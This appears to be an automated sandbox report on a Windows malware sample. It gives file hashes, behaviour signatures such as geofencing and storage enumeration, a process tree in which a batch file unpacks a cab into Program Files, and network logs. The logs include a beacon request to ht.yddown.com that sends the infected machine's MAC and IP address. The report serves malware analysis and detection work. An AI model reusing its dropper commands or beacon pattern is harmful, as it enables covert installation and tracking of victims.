Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/10/2022, 15:04 UTC

General

  • Target

    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe

  • Size

    640KB

  • MD5

    82a76655f9d478df789133e5023a6c71

  • SHA1

    32060f686b335039cd06cd6aed41db169e05fa4a

  • SHA256

    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17

  • SHA512

    0867f210868114733244c9822f680639f82c1ed04aa56f0a786810400818afd7193c88a570953936f41173c5d473b8851684bd79fbb12df4543268913594dafd

  • SSDEEP

    6144:nFYFN2CESrfI067dvxzEqjC0nzHHGSukYJ2cKLERd3lhv1do8hl3Xe69Ufcky:nFMocfIv7DzEqjrn2twEj3v1PNky

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    "C:\Users\Admin\AppData\Local\Temp\e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3532
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.v989.com/?xy
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4204
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4204 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:4304
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\tDosJ.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3928
      • C:\Windows\SysWOW64\expand.exe
        expand.exe "C:\Users\Admin\AppData\Local\Temp\kingsoft.cab" -F:*.* "C:\progra~1\kingsoft"
        3⤵
        • Drops file in Program Files directory
        PID:1528

Network

  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    www.3322.org
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    www.3322.org
    IN A
    Response
    www.3322.org
    IN CNAME
    members.3322.net
    members.3322.net
    IN CNAME
    dyndns.s.3322.net
    dyndns.s.3322.net
    IN A
    118.184.169.48
  • flag-cn
    GET
    http://www.3322.org/dyndns/getip
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    118.184.169.48:80
    Request
    GET /dyndns/getip HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    Host: www.3322.org
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    server: nginx
    date: Mon, 31 Oct 2022 06:11:53 GMT
    content-type: text/plain; charset=utf-8
    transfer-encoding: chunked
    vary: Accept-Encoding
  • flag-us
    DNS
    ht.yddown.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    ht.yddown.com
    IN A
    Response
    ht.yddown.com
    IN A
    107.167.59.228
  • flag-us
    GET
    http://ht.yddown.com/acjo/up_1.asp?a=D6:4C:48:77:ED:D1&b=154.61.71.51&c=0
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    107.167.59.228:80
    Request
    GET /acjo/up_1.asp?a=D6:4C:48:77:ED:D1&b=154.61.71.51&c=0 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    Host: ht.yddown.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Tue, 18 Oct 2022 08:24:52 GMT
    Content-Type: text/html
    Content-Length: 566
    Connection: keep-alive
  • flag-us
    DNS
    www.v989.com
    IEXPLORE.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.v989.com
    IN A
    Response
  • flag-us
    DNS
    www.v989.com
    IEXPLORE.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.v989.com
    IN A
    Response
  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    t.ukad.com
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    Remote address:
    8.8.8.8:53
    Request
    t.ukad.com
    IN A
    Response
  • flag-us
    DNS
    14.110.152.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    14.110.152.52.in-addr.arpa
    IN PTR
    Response
  • 93.184.221.240:80
    260 B
    5
  • 118.184.169.48:80
    http://www.3322.org/dyndns/getip
    http
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    710 B
    318 B
    12
    3

    HTTP Request

    GET http://www.3322.org/dyndns/getip

    HTTP Response

    200
  • 107.167.59.228:80
    http://ht.yddown.com/acjo/up_1.asp?a=D6:4C:48:77:ED:D1&b=154.61.71.51&c=0
    http
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    469 B
    886 B
    6
    4

    HTTP Request

    GET http://ht.yddown.com/acjo/up_1.asp?a=D6:4C:48:77:ED:D1&b=154.61.71.51&c=0

    HTTP Response

    404
  • 93.184.221.240:80
    322 B
    7
  • 104.80.225.205:443
    322 B
    7
  • 51.132.193.104:443
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 93.184.221.240:80
    322 B
    7
  • 204.79.197.200:443
    www.bing.com
    tls, https
    2.8kB
    8.5kB
    19
    18
  • 204.79.197.200:443
    ieonline.microsoft.com
    tls, http2
    iexplore.exe
    1.2kB
    8.1kB
    15
    14
  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    www.3322.org
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    58 B
    127 B
    1
    1

    DNS Request

    www.3322.org

    DNS Response

    118.184.169.48

  • 8.8.8.8:53
    ht.yddown.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    59 B
    75 B
    1
    1

    DNS Request

    ht.yddown.com

    DNS Response

    107.167.59.228

  • 8.8.8.8:53
    www.v989.com
    dns
    IEXPLORE.EXE
    58 B
    108 B
    1
    1

    DNS Request

    www.v989.com

  • 8.8.8.8:53
    www.v989.com
    dns
    IEXPLORE.EXE
    58 B
    58 B
    1
    1

    DNS Request

    www.v989.com

  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    t.ukad.com
    dns
    e2706de1fb70cd65825cbbec0600408741dd72842866700224cf0c98ac9fac17.exe
    56 B
    116 B
    1
    1

    DNS Request

    t.ukad.com

  • 8.8.8.8:53
    14.110.152.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    14.110.152.52.in-addr.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    5ddb1febcd291eb59d3d67d24a05bfd0

    SHA1

    fe957affe27cb991f332e7f5c86d3a15359bd3b9

    SHA256

    ec45a385c906b3d925ebbe6532d10adec9a14c1733c756c64db5133bd9d88dcb

    SHA512

    62d00893402fae125ae3428da2495b0eb864b125f975cd887f894f7298a4a86f361cf50aaa7c9b69f3dcb734a950c43472778ea4062b3146c3de5623d08dcd21

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    434B

    MD5

    362138704e78535b38bbac79494c0c14

    SHA1

    e048f1757d0eef32c384b47a7ad58a69b4250111

    SHA256

    b1bcd0177bf58971b31b26e33cb870f0443ad41f8a5bf845ffef9e6753df512f

    SHA512

    78512edc5627b62bf029221fb4be387a2cf86138020d0c81ddfe31bc74b58b5448bdefd0a6f9ebaeaaff93617423e8857ac3ed0e9c8e63328f71d477ed0d3f1f

  • C:\Users\Admin\AppData\Local\Temp\tDosJ.bat

    Filesize

    108B

    MD5

    7e088598ce2c636b6e9ca009fed77d5d

    SHA1

    017f9745191aae8555e7ade2db926350e8a2c19e

    SHA256

    c3d87b9342ad79a44d55a953b088c43f17c4e09543d5c9da4f29065c057f0148

    SHA512

    81d3eb04f8fbac072e532e1106a301de04c415797b713b2204fe7d00ace00b272a411e112ff4b8d5c15e1afeda124a6ad3c82edd8dc1b9b5d2176f7c013531df

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.